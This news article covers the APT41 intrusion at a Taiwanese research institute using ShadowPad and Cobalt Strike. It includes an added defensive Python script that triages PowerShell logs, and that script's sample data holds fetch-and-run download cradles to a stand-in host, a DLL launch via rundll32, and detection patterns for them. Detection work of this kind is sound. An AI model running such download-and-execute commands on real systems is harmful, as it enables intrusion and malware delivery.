
Taiwanese Institute Cyber Attack Involves APT41 Hackers Using ShadowPad and Cobalt Strike

A government-affiliated research institute in Taiwan specializing in computing and related technologies was compromised by nation-state threat actors linked to China, as revealed by Cisco Talos.

The breach occurred in mid-July 2023, with the attackers deploying backdoors and post-compromise tools like ShadowPad and Cobalt Strike. The attack has been attributed to the APT41 hacking group with medium confidence.

Security researchers Joey Chen, Ashley Shen, and Vitor Ventura explained that the ShadowPad malware was used to exploit a vulnerable version of Microsoft Office to load a second-stage loader for launching the payload.

Cisco Talos discovered the intrusion in August 2023 after abnormal PowerShell commands were detected; by then the actors had compromised three hosts and exfiltrated documents from the network.

The attackers utilized a web shell to maintain access, executing PowerShell scripts to launch ShadowPad and Cobalt Strike, with the latter delivered using a Go-based loader named CS-Avoid-Killing.

Mimikatz was used to extract passwords, and PowerShell commands were run to execute ShadowPad and fetch Cobalt Strike from a compromised server. Other steps taken included exploiting CVE-2018-0824 for privilege escalation and deploying UnmarshalPwn.
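The article notes that the intrusion surfaced when abnormal PowerShell activity was spotted, and that PowerShell was used both to launch ShadowPad and to fetch Cobalt Strike from a compromised server. The following added example (not code from Cisco Talos, the article, or the APT41 report) shows the kind of triage a defender can run over PowerShell script-block log entries. The log lines, the `example.invalid` host and the heuristic patterns are all constructed assumptions for illustration; real detections would be tuned to the environment's baseline.

```python
import base64
import re
from typing import List, Tuple

# Constructed sample lines standing in for PowerShell script-block log
# entries (Event ID 4104). They are illustrative only, not from the report.
SAMPLE_LOGS = [
    "Get-ChildItem C:\\Users\\analyst\\Documents",
    "powershell.exe -nop -w hidden -enc "
    + base64.b64encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload')"
        .encode("utf-16le")
    ).decode(),
    "Invoke-WebRequest -Uri http://example.invalid/loader.exe -OutFile C:\\Windows\\Temp\\svc.exe",
    "Get-Service | Where-Object {$_.Status -eq 'Running'}",
    "Start-Process rundll32.exe -ArgumentList 'C:\\ProgramData\\x.dll,Start'",
]

# Assumed heuristics: download cradles, in-memory execution, encoded commands,
# window-hiding flags, and DLL side-loading style launches via rundll32/regsvr32.
DOWNLOAD_CRADLE = re.compile(
    r"(Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|"
    r"Invoke-RestMethod|Start-BitsTransfer)", re.I)
INVOKE_EXPRESSION = re.compile(r"\b(IEX|Invoke-Expression)\b", re.I)
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_FLAGS = re.compile(r"-(?:noprofile|nop|windowstyle\s+hidden|w\s+hidden)", re.I)
LOADER_HINT = re.compile(r"\b(rundll32|regsvr32)\b.*\.dll", re.I)


def decode_encoded_command(line: str):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64) or None."""
    m = ENCODED_ARG.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_line(line: str) -> List[str]:
    """Return the list of heuristic reasons a line looks suspicious."""
    reasons = []
    decoded = decode_encoded_command(line)
    # Inspect both the raw line and its decoded payload, so an encoded
    # download cradle is still caught.
    text = line if decoded is None else line + " " + decoded
    if decoded is not None:
        reasons.append("encoded command")
    if HIDDEN_FLAGS.search(text):
        reasons.append("hidden/no-profile flags")
    if DOWNLOAD_CRADLE.search(text):
        reasons.append("download cradle")
    if INVOKE_EXPRESSION.search(text):
        reasons.append("invoke-expression")
    if LOADER_HINT.search(text):
        reasons.append("dll loader via rundll32/regsvr32")
    return reasons


def triage(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (index, reasons) for every line that trips at least one heuristic."""
    return [(i, r) for i, l in enumerate(lines) if (r := score_line(l))]


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_LOGS):
        print(f"line {idx}: {', '.join(reasons)}")
```

Lines 1, 2 and 4 of the constructed sample are flagged; the benign directory listing and service query are not. Decoding the encoded command before matching matters because the download cradle in the second line is invisible in the raw log text.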

The attackers attempted to avoid detection by halting their activity whenever they noticed other users logged on to the system. This disclosure follows Germany's attribution of a 2021 cyber attack to Chinese state actors.

China’s embassy in Berlin denied the accusation and called for an end to using cybersecurity for political smearing.
